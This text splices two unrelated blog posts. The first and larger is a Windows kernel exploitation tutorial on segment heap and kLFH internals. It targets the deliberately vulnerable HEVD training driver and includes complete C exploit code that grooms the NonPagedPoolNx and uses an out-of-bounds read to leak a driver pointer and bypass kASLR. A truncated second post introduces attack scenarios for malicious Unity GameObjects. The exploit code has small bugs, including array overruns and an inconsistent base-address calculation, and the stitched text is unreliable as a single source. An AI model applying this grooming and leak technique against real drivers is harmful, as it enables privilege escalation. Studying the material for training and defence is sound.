Notice how the ProcessBilled member isn’t a valid pointer to an _EPROCESS object. This is because this is a vanilla call to nt!ExAllocatePoolWithTag, without any scheduling quota madness going on, meaning the ProcessBilled member isn’t set. Since the AllocatorBackTraceIndex and PoolTagHash are obviously stored in a union, based on the fact that both the ProcessBilled and AllocatorBackTraceIndex members are at the same offset in memory, the two members AllocatorBackTraceIndex and PoolTagHash are actually “carried over” into the ProcessBilled member. This won’t affect anything, since the ProcessBilled member isn’t accounted for due to the fact that PoolQuota wasn’t set in the PoolType parameter, and this is how WinDbg interprets the memory layout. If the PoolQuota was set, the EPROCESS pointer is actually XOR’d with a random “cookie”, meaning that if you wanted to reconstruct this header you would need to first leak the cookie. This information will be useful later on in the pool overflow vulnerability in part 2, which will not leverage PoolQuota.

Let’s now talk about the segment heap. The segment heap, which was already instrumented in user mode, was implemented into the Windows kernel with the 19H1 build of Windows 10. The “gist” of the segment heap is this: when a component in the kernel requests some dynamic memory, via on the the previously mentioned API calls, there are now a few options, namely four of them, that can service the request. The are:

  1. Low Fragmentation Heap (kLFH)
  2. Variable Size (VS)
  3. Segment Alloc
  4. Large Alloc

Each pool is now managed by a _SEGMENT_HEAP structure, as seen below, which provides references to various “segments” in use for the pool and contains metadata for the pool.

The vulnerabilities mentioned in this blog post will be revolving around the kLFH, so for the purposes of this post I highly recommend reading this paper to find out more about the internals of each allocator and to view Yarden Shafir’s upcoming BlackHat talk on pool internals in the age of the segment heap!

For the purposes of this exploit and as a general note, let’s talk about how the _POOL_HEADER structure is used.

We talked about the _POOL_HEADER structure earlier - but let’s dig a big deeper into that concept to see if/when it is even used when the segment heap is enabled.

Any size allocation that cannot fit into a Variable Size segment allocation will pretty much end up in the kLFH. What is interesting here is that the _POOL_HEADER structure is no longer used for chunks within the VS segment. Chunks allocated using the VS segment are actually preceded prefaces with a header structure called _HEAP_VS_CHUNK_HEADER, which was pointed out to me by my co-worker Yarden Shafir. This structure can be seen in WinDbg.

The interesting fact about the pool headers with the segment heap is that the kLFH, which will be the target for this post, actually still use _POOL_HEADER structures to preface pool chunks.

Chunks allocated by the kLFH and VS segments are are shown below.

Why does this matter? For the purposes of exploitation in part 2, there will be a pool overflow at some point during exploitation. Since we know that pool chunks are prefaced with a header, and because we know that an invalid header will cause a crash, we need to be mindful of this. Using our overflow, we will need to make sure that a valid header is present during exploitation. Since our exploit will be targeting the kLFH, which still uses the standard _POOL_HEADER structure with no encoding, this will prove to be rather trivial later. _HEAP_VS_CHUNK_HEADER, however, performs additional encoding on its members.

The “last piece of this puzzle” is to understand how we can force the system to allocate pool chunks via the kLFH segment. The kLFH services requests that range in size from 1 byte to 16,368 bytes. The kLFH segment is also managed by the _HEAP_LFH_CONTEXT structure, which can be dumped in WinDbg.

The kLFH has “buckets” for each allocation size. The tl;dr here is if you want to trigger the kLFH you need to make 16 consecutive requests to the same size bucket. There are 129 buckets, and each bucket has a “granularity”. Let’s look at a chart to see the determining factors in where an allocation resides in the kLFH, based on size, which was taken from the previously mentioned paper from Corentin and Paul.

This means that any allocation that is a 16 byte granularity (e.g. 1-16 bytes, 17-31 bytes, etc.) up until a 64 byte granularity are placed into buckets 1-64, starting with bucket 1 for allocations of 1-16 bytes, bucket 2 for 17-31 bytes, and so on, up until a 512 byte granularity. Anything larger is either serviced by the VS segment or other various components of the segment heap.

Let’s say we perform a pool spray of objects which are 0x40 bytes and we do this 100 times. We can expect that most of these allocations will get stored in the kLFH, due to the heuristics of 16 consecutive allocations and because the size matches one of the buckets provided by kLFH. This is very useful for exploitation, as it means there is a good chance we can groom the pool with relatively well. Grooming refers to the fact we can get a lot of pool chunks, which we control, lined up adjacently next to each other in order to make exploitation reliable. For example, if we can groom the pool with objects we control, one after the other, we can ensure that a pool overflow will overflow data which we control, leading to exploitation. We will touch a lot more on this in the future.

kLFH also uses these predetermined buckets to manage chunks. This also removes something known as coalescing, which is when the pool manager combines multiple free chunks into a bigger chunk for performance. Now, with the kLFH, because of the architecture, we know that if we free an object in the kLFH, we can expect that the free will remain until it is used again in an allocation for that specific sized chunk! For example, if we are working in bucket 1, which can hold anything from 1 byte to 1008 bytes, and we allocate two objects of the size 1008 bytes and then we free these objects, the pool manager will not combine these slots because that would result in a free chunk of 2016 bytes, which doesn’t fit into the bucket, which can only hold 1-1008 bytes. This means the kLFH will keep these slots free until the next allocation of this size comes in and uses it. This also will be useful later on.

However, what are the drawbacks to the kLFH? Since the kLFH uses predetermined sizes we need to be very luck to have a driver allocate objects which are of the same size as a vulnerable object which can be overflowed or manipulated. Let’s say we can perform a pool overflow into an adjacent chunk as such, in this expertly crafted Microsoft Paint diagram.

If this overflow is happening in a kLFH bucket on the NonPagedPoolNx, for instance, we know that an overflow from one chunk will overflow into another chunk of the EXACT same size. This is because of the kLFH buckets, which predetermine which sizes are allowed in a bucket, which then determines what sizes adjacent pool chunks are. So, in this situation (and as we will showcase in this blog) the chunk that is adjacent to the vulnerable chunk must be of the same size as the chunk and must be allocated on the same pool type, which in this case is the NonPagedPoolNx. This severely limits the scope of objects we can use for grooming, as we need to find objects, whether they are typedef objects from a driver itself or a native Windows object that can be allocated from user mode, that are the same size as the object we are overflowing. Not only that, but the object must also contain some sort of interesting member, like a function pointer, to make the overflow worthwhile. This means now we need to find objects that are capped at a certain size, allocated in the same pool, and contain something interesting.

The last thing to say before we get into the out-of-bounds read is that some of the elements of this exploit are slightly contrived to outline successful exploitation. I will say, however, I have seen drivers which allocate pool memory, let unauthenticated clients specify the size of the allocation, and then return the contents to user mode - so this isn’t to say that there are not poorly written drivers out there. I do just want to call out, however, this post is more about the underlying concepts of pool exploitation in the age of the segment heap versus some “new” or “novel” way to bypass some of the stipulations of the segment heap. Now, let’s get into exploitation.

From Out-Of-Bounds-Read to kASLR bypass - Low-Integrity Exploitation

Let’s take a look at the file in HEVD called MemoryDisclosureNonPagedPoolNx.c. We will start with the code and eventually move our way into dynamic analysis with WinDbg.

The above snippet of code is a function which is defined as TriggerMemoryDisclosureNonPagedPoolNx. This function has a return type of NTSTATUS. This code invokes ExAllocatePoolWithTag and creates a pool chunk on the NonPagedPoolNx kernel pool of size POOL_BUFFER_SIZE and with the pool tag POOL_TAG. Tracing the value of POOL_BUFFER_SIZE in MemoryDisclosureNonPagedPoolNx.h, which is included in the MemoryDisclosureNonPagedPoolNx.c file, we can see that the pool chunk allocated here is 0x70 bytes in size. POOL_TAG is also included in Common.h as kcaH, which is more humanly readable as Hack.

After the pool chunk is allocated in the NonPagedPoolNx it is filled with 0x41 characters, 0x70 of them to be precise, as seen in the call to RtlFillMemory. There is no vulnerability here yet, as nothing so far is influenced by a client invoking an IOCTL which would reach this routine. Let’s continue down the code to see what happens.

After initializing the buffer to a value of 0x70 0x41 characters, the first defined parameter in TriggerMemoryDisclosureNonPagedPoolNx, which is PVOID UserOutputBuffer, is part of a ProbeForWrite routine to ensure this buffer resides in user mode. Where does UserOutputBuffer come from (besides it’s obvious name)? Let’s view where the function TriggerMemoryDisclosureNonPagedPoolNx is actually invoked from, which is at the end of MemoryDisclosureNonPagedPoolNx.c.

We can see that the first argument passed to TriggerMemoryDisclosureNonPagedPoolNx, which is the function we have been analyzing thus far, is passed an argument called UserOutputBuffer. This variable comes from the I/O Request Packet (IRP) which was passed to the driver and created by a client invoking DeviceIoControl to interact with the driver. More specifically, this comes from the IO_STACK_LOCATION structure, which always accompanies an IRP. This structure contains many members and data used by the IRP to pass information to the driver. In this case, the associated IO_STACK_LOCATION structure contains most of the parameters used by the client in the call to DeviceIoControl. The IRP structure itself contains the UserBuffer parameter, which is actually the output buffer supplied by a client using DeviceIoControl. This means that this buffer will be bubbled back up to user mode, or any client for that matter, which sends an IOCTL code that reaches this routine. I know this seems like a mouthful right now, but I will give the “tl;dr” here in a second.

Essentially what happens here is a user-mode client can specify a size and a buffer, which will get used in the call to TriggerMemoryDisclosureNonPagedPoolNx. Let’s then take a quick look back at the image from two images ago, which has again been displayed below for brevity.

Skipping over the #ifdef SECURE directive, which is obviously what a “secure” driver should use, we can see that if the allocation of the pool chunk we previously mentioned, which is of size POOL_BUFFER_SIZE, or 0x70 bytes, is successful - the contents of the pool chunk are written to the UserOutputBuffer variable, which will be returned to the client invoking DeviceIoControl, and the amount of data copied to this buffer is actually decided by the client via the nOutBufferSize parameter.

What is the issue here? ExAllocatePoolWithTag will allocate a pool chunk based on the size provided here by the client. The issue is that the developer of this driver is not just copying the output to the UserOutputBuffer parameter but that the call to RtlCopyMemory allows the client to decide the amount of bytes written to the UserOutputBuffer parameter. This isn’t an issue of a buffer overflow on the UserOutputBuffer part, as we fully control this buffer via our call to DeviceIoControl, and can make it a large buffer to avoid it being overflowed. The issue is the second and third parameter.

The pool chunk allocated in this case is 0x70 bytes. If we look at the #ifdef SECURE directive, we can see that the KernelBuffer created by the call to ExAllocatePoolWithTag is copied to the UserOutputBuffer parameter and NOTHING MORE, as defined by the POOL_BUFFER_SIZE parameter. Since the allocation created is only POOL_BUFFER_SIZE, we should only allow the copy operation to copy this many bytes.

If a size greater than 0x70, or POOL_BUFFER_SIZE, is provided to the RtlCopyMemory function, then the adjacent pool chunk right after the KernelBuffer pool chunk would also be copied to the UserOutputBuffer. The below diagram outlines.

If the size of the copy operation is greater than the allocation size of0x70 bytes, the number of bytes after 0x70 are taken from the adjacent chunk and are also bubbled back up to user mode. In the case of supplying a value of 0x100 in the size parameter, which is controllable by the caller, the 0x70 bytes from the allocation would be copied back into user and the next 0x30 bytes from the adjacent chunk would also be copied back into user mode. Let’s verify this in WinDbg.

For brevity sake, the routine to reach this code is via the IOCTL 0x0022204f. Here is the code we are going to send to the driver.

We can start by setting a breakpoint on HEVD!TriggerMemoryDisclosureNonPagedPoolNx

Per the __fastcall calling convention the two arguments passed to TriggerMemoryDisclosureNonPagedPoolNx will be in RCX (the UserOutputBuffer) parameter and RDX (the size specified by us). Dumping the RCX register, we can see the 70 bytes that will hold the allocation.

We can then set a breakpoint on the call to nt!ExAllocatePoolWithTag.

After executing the call, we can then inspect the return value in RAX.

Interesting! We know the IOCTL code in this case allocated a pool chunk of 0x70 bytes, but every allocation in the pool our chunk resides in, which is denoted with the asterisk above, is actually 0x80 bytes. Remember - each chunk in the kLFH is prefaced with a _POOL_HEADER structure. We can validate this below by ensuring the offset to the PoolTag member of _POOL_HEADER is successful.

The total size of this pool chunk with the header is 0x80 bytes. Recall earlier when we spoke about the kLFH that this size allocation would fall within the kLFH! We know the next thing the code will do in this situation is to copy 0x41 values into the newly allocated chunk. Let’s set a breakpoint on HEVD!memset, which is actually just what the RtlFillMemory macro defaults to.

Inspecting the return value, we can see the buffer was initialized to 0x41 values.

The next action, as we can recall, is the copying of the data from the newly allocated chunk to user mode. Setting a breakpoint on the HEVD!memcpy call, which is the actual function the macro RtlCopyMemory will call, we can inspect RCX, RDX, and R8, which will be the destination, source, and size respectively.

Notice the value in RCX, which is a user-mode address (and the address of our output buffer supplied by DeviceIoControl), is different than the original value shown. This is simply because I had to re-run the POC trigger between the original screenshot and the current. Other than that, nothing else has changed.

After stepping through the memcpy call we can clearly see the contents of the pool chunk are returned to user mode.

Perfect! This is expected behavior by the driver. However, let’s try increasing the size of the output buffer and see what happens, per our hypothesis on this vulnerability. This time, let’s set the output buffer to 0x100.

This time, let’s just inspect the memcpy call.

Take note of the above highlighted content after the 0x41 values.

Let’s now check out the pool chunks in this pool and view the adjacent chunk to our Hack pool chunk.

Last time we performed the IOCTL invocation only values of 0x41 were bubbled back up to user mode. However, recall this time we specified a value of 0x100. This means this time we should also be returning the next 0x30 bytes after the Hack pool chunk back to user mode. Taking a look at the previous image, which shows that the direct next chunk after the Hack chunk is 0xffffe48f4254fb00, which contains a value of 6c54655302081b00 and so on, which is the _POOL_HEADER for the next chunk, as seen below.

These 0x10 bytes, plus the next 0x20 bytes should be returned to us in user mode, as we specified we want to go beyond the bounds of the pool chunk, hence an “out-of-bounds read”. Executing the POC, we can see this is the case!

Awesome! We can see, minus some of the endianness madness that is occurring, we have successfully read memory from the adjacent chunk! This is very useful, but remember what our goal is - we want to bypass kASLR. This means we need to leak some sort of pointer either from the driver or ntoskrnl.exe itself. How can we achieve this if all we can leak is the next adjacent pool chunk? To do this, we need to perform some additional steps to ensure that, while we are in the kLFH segment, that the adjacent chunk(s) always contain some sort of useful pointer that can be leaked by us. This process is called “pool grooming”

Taking The Dog To The Groomer

Up until this point we know we can read data from adjacent pool chunks, but as of now there isn’t really anything interesting next to these chunks. So, how do we combat this? Let’s talk about a few assumptions here:

  1. We know that if we can choose an object to read from, this object will need to be 0x70 bytes in size (0x80 when you include the _POOL_HEADER)
  2. This object needs to be allocated on the NonPagedPoolNx directly after the chunk allocated by HEVD in MemoryDisclosureNonPagedPoolNx
  3. This object needs to contain some sort of useful pointer

How can we go about doing this? Let’s sort of visualize what the kLFH does in order to service requests of 0x70 bytes (technically 0x80 with the header). Please note that the following diagram is for visual purposes only.

As we can see, there are several free slots within this specific page in the pool. If we allocated an object of size 0x80 (technically 0x70, where the _POOL_HEADER is dynamically created) we have no way to know, or no way to force the allocation to occur at a predictable location. That said, the kLFH may not even be enabled at all, due to the heuristic requirement of 16 consecutive allocations to the same size. Where does this leave us? Well, what we can do is to first make sure the kLFH is enabled and then also to “fill” all of the “holes”, or freed allocations currently, with a set of objects. This will force the memory manager to allocate a new page entirely to service new allocations. This process of the memory manager allocating a new page for future allocations within the the kLFH bucket is ideal, as it gives us a “clean slate” to start on without random free chunks that could be serviced at random intervals. We want to do this before we invoke the IOCTL which triggers the TriggerMemoryDisclosureNonPagedPoolNx function in MemoryDisclosureNonPagedPoolNx.c. This is because we want the allocation for the vulnerable pool chunk, which will be the same size as the objects we use for “spraying” the pool to fill the holes, to end up in the same page as the sprayed objects we have control over. This will allow us to groom the pool and make sure that we can read from a chunk that contains some useful information.

Let’s recall the previous image which shows where the vulnerable pool chunk ends up currently.

Organically, without any grooming/spraying, we can see that there are several other types of objects in this page. Notably we can see several Even tags. This tag is actually a tag used for an object created with a call to CreateEvent, a Windows API, which can actually be invoked from user mode. The prototype can be seen below.

This function returns a handle to the object, which is a technically a pool chunk in kernel mode. This is reminiscent of when we obtain a handle to the driver for the call to CreateFile. The handle is an intermediary object that we can interact with from user mode, which has a kernel mode component.

Let’s update the code to leverage CreateEventA to spray an arbitrary amount of objects, 5000.

After executing the newly updated code and after setting a breakpoint on the copy location, with the vulnerable pool chunk, take a look at the state of the page which contains the pool chunk.

This isn’t in an ideal state yet, but notice how we have influenced the page’s layout. We can see now that there are many free objects and a few event objects. This is reminiscent behavior of us getting a new page for our vulnerable chunk to go, as our vulnerable chunk is prefaces with several event objects, with our vulnerable chunk being allocated directly after. We can also perform additional analysis by inspecting the previous page (recall that for our purposes on this 64-bit Windows 10 install a page is 0x1000 bytes, of 4KB).

It seems as though all of the previous chunks that were free have been filled with event objects!

Notice, though, that the pool layout is not perfect. This is due to other components of the kernel also leveraging the kLFH bucket for 0x70 byte allocations (0x80 with the _POOL_HEADER).

Now that we know we can influence the behavior of the pool from spraying, the goal now is to now allocate the entire new page with event objects and then free every other object in the page we control in the new page. This will allow us to then, right after freeing every other object, to create another object of the same size as the event object(s) we just freed. By doing this, the kLFH, due to optimization, will fill the free slots with the new objects we allocate. This is because the current page is the only page that should have free slots available in the NonPagedPoolNx for allocations that are being serviced by the kLFH for size 0x70 (0x80 including the header).

We would like the pool layout to look like this (for the time being):

EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT 

So what kind of object would we like to place in the “holes” we want to poke? This object is the one we want to leak back to user mode, so it should contain either valuable kernel information or a function pointer. This is the hardest/most tedious part of pool corruption, is finding something that is not only the size needed, but also contains valuable information. This especially bodes true if you cannot use a generic Windows object and need to use a structure that is specific to a driver.

In any event, this next part is a bit “simplified”. It will take a bit of reverse engineering/debugging to calls that allocate pool chunks for objects to find a suitable candidate. The way to approach this, at least in my opinion, would be as follows:

  1. Identify calls to ExAllocatePoolWithTag, or similar APIs
  2. Narrow this list down by finding calls to the aforementioned API(s) that are allocated within the pool you are able to corrupt (e.g. if I have a vulnerability on the NonPagedPoolNx, find an allocation on the NonPagedPoolNx)
  3. Narrow this list further by finding calls that perform the before sentiments, but for the given size pool chunk you need
  4. If you have made it this far, narrow this down further by finding an object with all of the before attributes and with an interesting member, such as a function pointer

However, slightly easier because we can use the source code, let’s find a suitable object within HEVD. In HEVD there is an object which contains a function pointer, called USE_AFTER_FREE_NON_PAGED_POOL_NX. It is constructed as such, within UseAfterFreeNonPagedPoolNx.h

This structure is used in a function call within UseAfterFreeNonPagedPoolNx.c and the Buffer member is initialized with 0x41 characters.

The Callback member, which is of type FunctionCallback and is defined as such in Common.h: typedef void (*FunctionPointer)(void);, is set to the memory address of UaFObjectCallbackNonPagedPoolNx, which a function located in UseAfterFreeNonPagedPoolNx.c shown two images ago! This means a member of this structure will contain a function pointer within HEVD, a kernel mode address. We know by the name that this object will be allocated on the NonPagedPoolNx, but you could still validate this by performing static analysis on the call to ExAllocatePoolWithTag to see what value is specified for POOL_TYPE.

This seems like a perfect candidate! The goal will be to leak this structure back to user mode with the out-of-bounds read vulnerability! The only factor that remains is size - we need to make sure this object is also 0x70 bytes in size, so it lands within the same pool page we control.

Let’s test this in WinDbg. In order to reach the AllocateUaFObjectNonPagedPoolNx function we need to interact with the IOCTL handler for this particular routine, which is defined in NonPagedPoolNx.c.

The IOCTL code needed to reach this routine, for brevity, is 0x00222053. Let’s set a breakpoint on HEVD!AllocateUaFObjectNonPagedPoolNx in WinDbg, issue a DeviceIoControl call to this IOCTL without any buffers, and see what size is being used in the call to ExAllocatePoolWithTag to allocate this object.

Perfect! Slightly contrived, but nonetheless true, the object being created here is also 0x70 bytes (without the _POOL_HEADER structure) - meaning this object should be allocated adjacent to any free slots within the page our event objects live! Let’s update our POC to perform the following:

  1. Free every other event object
  2. Replace every other event object (5000/2 = 2500) with a USE_AFTER_FREE_NON_PAGED_POOL_NX object

Using the memcpy routine (RtlCopyMemory) from the original routine for the out-of-bounds read IOCTL invocation into the vulnerable pool chunk, we can inspect the target pool chunk used in the copy operation, which will be the chunk bubbled back up to user mode, which could showcase that our event objects are now adjacent to multiple USE_AFTER_FREE_NON_PAGED_POOL_NX objects.

We can see that the Hack tagged chunks, which are USE_AFTER_FREE_NON_PAGED_POOL_NX chunks, are pretty much adjacent with the event objects! Even if not every object is perfectly adjacent to the previous event object, this is not a worry to us because the vulnerability allows us to specify how much of the data from the adjacent chunks we would like to return to user mode anyways. This means we could specify an arbitrary amount, such as 0x1000, and that is how many bytes would be returned from the adjacent chunks.

Since there are many chunks which are adjacent, it will result in an information leak. The reason for this is because the kLFH has a bit of “funkiness” going on. This isn’t necessarily due to any sort of kLFH “randomization”, I found out after talking with my colleague Yarden Shafir, where the free chunks will be/where the allocations will occur, but due to the complexity of the subsegment locations, caching, etc. Things can get complex quite quickly. This is beyond the scope of this blog post.

The only time this becomes an issue, however, is when clients can read out-of-bounds but cannot specify how many bytes out-of-bounds they can read. This would result in exploits needing to run a few times in order to leak a valid kernel address, until the chunks become adjacent. However, someone who is better at pool grooming than myself could easily figure this out I am sure :).

Now that we can groom the pool decently enough, the next step is to replace the rest of the event objects with vulnerable objects from the out-of-bounds read vulnerability! The desired layout of the pool will be this:

VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX 

Why do we want this to be the desired layout? Each of the VULNERABLE_OBJECTS can read additional data from adjacent chunks. Since (theoretically) the next adjacent chunk should be USE_AFTER_FREE_NON_PAGED_POOL_NX, we should be returning this entire chunk to user mode. Since this structure contains a function pointer in HEVD, we can then bypass kASLR by leaking a pointer from HEVD! To do this, we will need to perform the following steps:

  1. Free the rest of the event objects
  2. Perform a number of calls to the IOCTL handler for allocating vulnerable chunks

For step two, we don’t want to perform 2500 DeviceIoControl calls, as there is potential for the one of the last memory address in the page to be set to one of our vulnerable objects. If we specify we want to read 0x1000 bytes, and if our vulnerable object is at the end of the last valid page for the pool, it will try reading from the address 0x1000 bytes away, which may reside in a page which is not currently committed to memory, causing a DOS by referencing invalid memory. To compensate for this, we only want to allocate 100 vulnerable objects, as one of them will almost surely be allocated in an adjacent block to a USE_AFTER_FREE_NON_PAGED_POOL_NX object.

To do this, let’s update the code as follows.

After freeing the event objects and reading back data from adjacent chunks, a for loop is instituted to parse the output for anything that is sign extended (a kernel-mode address). Since the output buffer will be returned in an unsigned long long array, the size of a 64-bit address, and since the address we want to leak from is the first member of the adjacent chunk, after the leaked _POOL_HEADER, it should be placed into a clean 64-bit variable, and therefore easily parsed. Once we have leaked the address of the pointer to the function, we then can calculate the distance from the function to the base of HEVD, add the distance, and then obtain the base of HEVD!

Executing the final exploit, leveraging the same breakpoint on final HEVD!memcpy call (remember, we are executing 100 calls to the final DeviceIoControl routine, which invokes the RtlCopyMemory routine, meaning we need to step through 99 times to hit the final copy back into user mode), we can see the layout of the pool.

The above image is a bit difficult to decipher, given that both the vulnerable chunks and the USE_AFTER_FREE_NON_PAGED_POOL_NX chunks both have Hack tags. However, if we take the adjacent chunk to the current chunk, which is a vulnerable chunk we can read past and denoted by an asterisk, and after parsing it as a USE_AFTER_FREE_NON_PAGED_POOL_NX object, we can see clearly that this object is of the correct type and contains a function pointer within HEVD!

We can then subtract the distance from this function pointer to the base of HEVD, and update our code accordingly. We can see the distance is 0x880cc, so adding this to the code is trivial.

After performing the calculation, we can see we have bypassed kASLR, from low integrity, without any calls to EnumDeviceDrivers or similar APIs!

The final code can be seen below.

// HackSysExtreme Vulnerable Driver: Pool Overflow/Memory Disclosure
// Author: Connor McGarr(@33y0re)

// Vulnerability description: Arbitrary read primitive
// User-mode clients have the ability to control the size of an allocated pool chunk on the NonPagedPoolNx
// This pool chunk is 0x80 bytes (including the header)
// There is an object, a UafObject created by HEVD, that is 0x80 bytes in size (including the header) and contains a function pointer that is to be read -- this must be used due to the kLFH, which is only groomable for sizes in the same bucket
// CreateEventA can be used to allocate 0x80 byte objects, including the size of the header, which can also be used for grooming

#include <windows.h>
#include <stdio.h>

// Fill the holes in the NonPagedPoolNx of 0x80 bytes
void memLeak(HANDLE driverHandle)
{
  // Array to manage handles opened by CreateEventA
  HANDLE eventObjects[5000];

  // Spray 5000 objects to fill the new page
  for (int i = 0; i <= 5000; i++)
  {
    // Create the objects
    HANDLE tempHandle = CreateEventA(
      NULL,
      FALSE,
      FALSE,
      NULL
    );

    // Assign the handles to the array
    eventObjects[i] = tempHandle;
  }

  // Check to see if the first handle is a valid handle
  if (eventObjects[0] == NULL)
  {
    printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

    // Close half of the handles
    for (int i = 0; i <= 5000; i += 2)
    {
      BOOL tempHandle1 = CloseHandle(
        eventObjects[i]
      );

      eventObjects[i] = NULL;

      // Error handling
      if (!tempHandle1)
      {
        printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
    }

    printf("[+] Poked holes in the new pool page!\n");

    // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
    // kLFH should automatically fill the freed holes with the UAF objects
    DWORD bytesReturned;

    for (int i = 0; i < 2500; i++)
    {
      DeviceIoControl(
        driverHandle,
        0x00222053,
        NULL,
        0,
        NULL,
        0,
        &bytesReturned,
        NULL
      );
    }

    printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

    // Close the rest of the event objects
    for (int i = 1; i <= 5000; i += 2)
    {
      BOOL tempHandle2 = CloseHandle(
        eventObjects[i]
      );

      eventObjects[i] = NULL;

      // Error handling
      if (!tempHandle2)
      {
        printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
    }

    // Array to store the buffer (output buffer for DeviceIoControl) and the base address
    unsigned long long outputBuffer[100];
    unsigned long long hevdBase;

    // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
    // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

    for (int i = 0; i <= 100; i++)
    {
      // Return buffer
      DWORD bytesReturned1;

      DeviceIoControl(
        driverHandle,
        0x0022204f,
        NULL,
        0,
        &outputBuffer,
        sizeof(outputBuffer),
        &bytesReturned1,
        NULL
      );

    }

    printf("[+] Successfully triggered the out-of-bounds read!\n");

    // Parse the output
    for (int i = 0; i <= 100; i++)
    {
      // Kernel mode address?
      if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
      {
        printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
        printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

        // Store the variable for future usage
        hevdBase = outputBuffer[i] + 0x880CC;
        break;
      }
    }
  }
}

void main(void)
{
  // Open a handle to the driver
  printf("[+] Obtaining handle to HEVD.sys...\n");

  HANDLE drvHandle = CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver",
    GENERIC_READ | GENERIC_WRITE,
    0x0,
    NULL,
    OPEN_EXISTING,
    0x0,
    NULL
  );

  // Error handling
  if (drvHandle == (HANDLE)-1)
  {
    printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    memLeak(drvHandle);
  }
}

Conclusion

Kernel exploits from browsers, which are sandboxed, require such leaks to perform successful escalation of privileges. In part two of this series we will combine this bug with HEVD’s pool overflow vulnerability to achieve a read/write primitive and perform successful EoP! Please feel free to reach out with comments, questions, or corrections!

Peace, love, and positivity :-)

Hacking Unity Games with Malicious GameObjects

At IncludeSec our clients are asking us to hack on all sorts of crazy applications from mass scale web systems to IoT devices and low-level firmware. Something that we’re seeing more of is hacking virtual reality systems and mass scale video games so we had a chance to do some research and came up with what we believe to be a novel attack against Unity-powered games!

Specifically, this post will outline:

  • Two ways I found that GameObjects (a non-code asset type) can be crafted to cause arbitrary code to run.
  • Five possible ways an attacker might use a malicious GameObject to compromise a Unity game.
  • How game developers can mitigate the risk.

Unity has also published their own blog post on this subject. Be sure to check that out for their specific recommendations and how to protect against this sort of vulnerability.

Terminology

First a brief primer on the terms I’m going to use for those less familiar with Unity.

  • GameObjects are entities in Unity that can have any number of components attached.
  • Components are added to GameObjects to make them do things. They include Unity built-in components, like UI elements and sprite renderers, as well as custom scripted components used to build the game logic.
  • Assets are the elements that make up the game. This includes images, sounds, scripts, and GameObjects, among other things.
  • AssetBundles are a way to package non-code assets and allow them to be loaded at runtime (from the web or locally). They are used to decrease initial download size, allow downloadable content, as well as sometimes to enable modding of the game.

Ways a malicious GameObject could get into a game

Before going into details about how a GameObject could execute code, let’s talk about how it would get in the game in the first place so that we’re clear on the attack scenarios. I came up with five ways a malicious GameObject might find its way into a Unity game:

Way 1: the most obvious route is if the game developer downloaded it and added it to the game project. This might be an asset they purchased on the Unity Asset Store, or something they found on GitHub that solved a problem they were having.

Way 2: Unity AssetBundles allow non-script assets (including GameObjects) to be imported into a game at runtime. There may be an assumption that these assets are safe, since they contain no custom script assets, but as you’ll see further into the post that is not a safe assumption. For example, sometimes AssetBundles are used to add modding functionality to a game. If that’s the case, then third-party mods downloaded by a user can unexpectedly cause code execution, similar to running untrusted programs from the internet.

Way 3: AssetBundles can be downloaded from the internet at runtime without transport encryption enabling man-in-the-middle attacks. The Unity documentation has an example of how to do this, partially listed below:

UnityWebRequest uwr = UnityWebRequestAssetBundle.GetAssetBundle("http://www.my-server.com/mybundle")

In the Unity-provided example, the AssetBundle is being downloaded over HTTP. If an AssetBundle is downloaded over HTTP (which lacks the encryption and certificate validation of HTTPS), an attacker with a man-in-the-middle position of whoever is running the game could tamper with the AssetBundle in transit and replace it with a malicious one. This could, for example, affect players who are playing on an untrusted network such as a public WiFi access point.

Way 4: AssetBundles can be downloaded from the internet at runtime with transport encryption but man-in-the-middle attacks might still be possible.

Unity has this to say about certificate validation when using UnityWebRequests:

Some platforms will validate certificates against a root certificate authority store. Other platforms will simply bypass certificate validation completely.

According to the docs, even if you use HTTPS, on certain platforms Unity won’t check certificates to verify it’s communicating with the intended server, opening the door for possible AssetBundle tampering. It’s possible to create your own certificate handler, but only on specific platforms:

Note: Custom certificate validation is currently only implemented for the following platforms – Android, iOS, tvOS and desktop platforms.

I could not find information about which platforms “bypass certificate validation completely”, but I’m guessing it’s the less-common ones? Still, if you’re developing a game that downloads AssetBundles, you might want to verify that certificate validation is working on the platforms you use.

Way 5: Malicious insider. A contributor on a development team or open source project wants to add some bad code to a game. But maybe the dev team has code reviews to prevent this sort of thing. Likely, those code reviews don’t extend to the GameObjects themselves, so the attacker smuggles their code into a GameObject that gets deployed with the game.

Crafting malicious GameObjects

I think it’s pretty obvious why you wouldn’t want arbitrary code running in your game — it might compromise players’ computers, steal their data, crash the game, etc. If the malicious code runs on a development machine, the attacker could potentially steal the source code or pivot to attack the studio’s internal network. Peter Clemenko had another interesting perspective on his blog: essentially, in the near-future augmented-reality cyberpunk ready-player-1 upcoming world an attacker may seek to inject things into a user’s reality to confuse, distract, annoy, and that might cause real-world harm.

So, how can non-script assets get code execution?

